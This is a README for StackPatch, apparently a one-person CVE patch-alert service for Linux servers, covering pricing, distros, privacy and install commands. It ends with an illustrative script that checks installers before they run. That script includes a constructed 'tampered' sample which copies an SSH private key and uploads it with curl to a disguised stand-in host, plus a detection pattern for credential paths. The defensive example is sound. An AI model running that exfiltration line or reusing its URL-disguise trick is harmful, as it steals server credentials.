# StackPatch / MindSparkStack

StackPatch is CVE patch ops for indie SaaS shops running Linux servers. It is built and operated by Aiden Bolin at MindSparkStack, a one-person company.

## What StackPatch does

When a new CVE drops, StackPatch tells you in 5 minutes whether your servers are affected and exactly what command to run. Hourly inventory + matcher against the live CVE feeds for Ubuntu USN, Debian Security Tracker, Alpine secdb, OSV.dev (RHEL family), and NVD. Each finding includes the exact apt / apk / dnf one-liner, the affected package + installed vs fixed version, and a public audit URL the operator can share with their own customers during security due diligence.

## Free tier

`curl https://mindsparkstack.com/scan.sh | bash` — anonymous CVE quickscan. Reads `/etc/os-release`, `uname -r`, top 200 packages from the system package manager. POSTs to a public API. Returns matching CVEs in <1 second. No signup, no card, no installation. Source rendered as `text/plain` at https://mindsparkstack.com/scan.sh so it can be read before piping.

## Paid product

$99 lifetime founder seat (50 only, per-server pricing covers 3 servers, no subscription). Includes the agent, hourly auto-scan, email + Discord/Slack webhook alerts on new findings, public audit URL per server, all V2+ features, 30-day refund window. Buyers install via `curl https://mindsparkstack.com/install.sh | sudo bash -s -- --token `.

## Distros covered (V1)

- Ubuntu (noble, jammy, focal, bionic) — via Ubuntu Security Notice feed
- Debian (bookworm, trixie, bullseye) — via Debian Security Tracker
- Alpine Linux (v3.18, v3.19, v3.20, v3.21, edge) — via secdb
- AlmaLinux (8, 9, 10) — via OSV.dev bulk feed
- Rocky Linux (8, 9, 10) — via OSV.dev bulk feed

## What StackPatch does NOT do (V1)

- No container image scanning (use Trivy / Grype for that)
- No IaC / Terraform / Kubernetes scanning (use Trivy / Snyk)
- No dev-time / CI scanning (use Snyk / Grype)
- No auto-apply (deliberate — security tools that mutate hosts are too easy to get wrong)
- No SOC 2 / ISO 27001 / HIPAA compliance attestations
- No support for RHEL upstream (paid), Amazon Linux, openSUSE, FreeBSD yet

## Key URLs

- Product: https://mindsparkstack.com/patch
- Free quickscan UI: https://mindsparkstack.com/patch/scan
- Live demo audit (own VPS, public): https://mindsparkstack.com/patch/audit/mss-vps
- Playbook reference (5 remediation classes): https://mindsparkstack.com/patch/playbook
- Comparison vs vuls.io: https://mindsparkstack.com/patch/vs-vuls
- Comparison vs Trivy: https://mindsparkstack.com/patch/vs-trivy
- Comparison vs Grype: https://mindsparkstack.com/patch/vs-grype
- Comparison vs Snyk: https://mindsparkstack.com/patch/vs-snyk
- Per-CVE detail: https://mindsparkstack.com/patch/cves/cve/
- Per-package detail: https://mindsparkstack.com/patch/packages/
- Recent CVE digest: https://mindsparkstack.com/patch/cves/digest
- Service status: https://mindsparkstack.com/status
- Data handling reference: https://mindsparkstack.com/patch/security
- Engineering changelog: https://mindsparkstack.com/changelog
- Onboarding (post-purchase): https://mindsparkstack.com/patch/onboarding/success?session_id=
- Install script source: https://mindsparkstack.com/install.sh (text/plain)
- Quickscan script source: https://mindsparkstack.com/scan.sh (text/plain)

## Privacy

The agent collects: distro, codename, kernel version, package names+versions, Docker image names+tags, listening ports, modprobe blacklist files, hostname redacted to first 4 chars + ***.

The agent never collects: SSH keys, env vars, source code, database contents, customer data, full hostnames, IPs, MAC addresses, logs, or third-party trackers.

All data is stored on a single Hostinger VPS in `/var/lib/stackpatch/` — no cloud DB, no telemetry vendor, no log aggregator. Daily backups. Retention: latest inventory only; findings kept for resolution history; quickscan submissions cached 5 min then dropped.

## Verification

Source code for the agent (`install.sh`, `scan.sh`) is rendered as plain text so users can grep it before running. The service status page at https://mindsparkstack.com/status reads poller state files directly from disk. The MindSparkStack VPS audit at https://mindsparkstack.com/patch/audit/mss-vps is the same data shape every paying customer gets — public, no NDA, no signup.

## Contact

Email: agents@mindsparkstack.com (responds within 24h, routes to a human operator).

## License + repo

Site source: https://github.com/Accuoa/mindsparkstack-next

Closed-source agent + matcher (will open-source once V1 is stable).

## Featured coverage / external write-ups

- Build log on dev.to (architecture + honest vs-vuls comparison): https://dev.to/aiden_bolin_c3f6ef002625c/i-built-a-cve-patch-ops-tool-for-indie-saas-shops-in-a-weekend-open-scan-honest-comparison-vs-3llk

## Payment surfaces

Stripe Checkout via payment link `https://buy.stripe.com/3cIcN73Rx9r25QG1VGcV20g`. Apple Pay enabled at checkout for both `mindsparkstack.com` and `buy.stripe.com` Stripe-registered domains (Stripe `apple_pay/domains` registration).

## Last updated

2026-05-01 — V1 complete + dev.to launch shipped + Apple Pay domain registered. Hourly cron loops produce ~10–50 new CVE rows per day across all 5 distros.
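
## Added example: checking a downloaded script before running it

The read-before-piping step described under "Free tier" and "Verification" can be partly scripted once the file is saved to disk. This is an added example, not part of StackPatch or its scripts: it assumes the script should only contact `mindsparkstack.com`, and the function names, the pattern list and both sample scripts are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: static checks on an installer saved to disk, before it is run.
# Assumption: the only host the script should contact is the vendor domain.
ALLOWED_HOSTS="mindsparkstack.com"
# Starting list of patterns for data the page says the agent never collects.
SENSITIVE_RE='\.ssh/|id_rsa|id_ed25519|/etc/shadow|printenv|/proc/[^ ]*/environ|/var/log/'

# Print each distinct host named in an http(s) URL, with userinfo and port removed.
list_hosts() {
  grep -Eo "https?://[^/[:space:]\"']+" "$1" |
    sed -E 's#^https?://##; s#^.*@##; s#:[0-9]+$##' | tr 'A-Z' 'a-z' | sort -u
}

# Print hosts that are not an exact match for an allowlisted host.
unexpected_hosts() {
  list_hosts "$1" | while read -r host; do
    case " $ALLOWED_HOSTS " in
      *" $host "*) ;;
      *) echo "$host" ;;
    esac
  done
}

# Print numbered lines that reference sensitive paths or dump the environment.
sensitive_lines() { grep -nE "$SENSITIVE_RE" "$1"; }

# Succeed only when both checks come back empty.
audit_script() {
  [ -z "$(unexpected_hosts "$1")" ] && [ -z "$(sensitive_lines "$1")" ]
}

# Constructed samples (not the real scan.sh; the /api path is made up).
write_samples() {
  cat > "$1/clean.sh" <<'EOF'
#!/usr/bin/env bash
. /etc/os-release
curl -s -X POST https://mindsparkstack.com/api -d "os=$ID&kernel=$(uname -r)"
EOF
  cat > "$1/tampered.sh" <<'EOF'
#!/usr/bin/env bash
cp ~/.ssh/id_ed25519 /tmp/k
curl -s https://mindsparkstack.com@collector.example.net:8443/in -T /tmp/k
EOF
}

# Intended use: curl -fsSL https://mindsparkstack.com/scan.sh -o scan.sh
#               audit_script scan.sh && less scan.sh   # then decide whether to run it
```

A pass only narrows what to read by hand: hosts are matched exactly, so a look-alike such as `mindsparkstack.com.example.org` or a `user@host` URL is reported, but a script that builds its URLs at run time still needs a manual read.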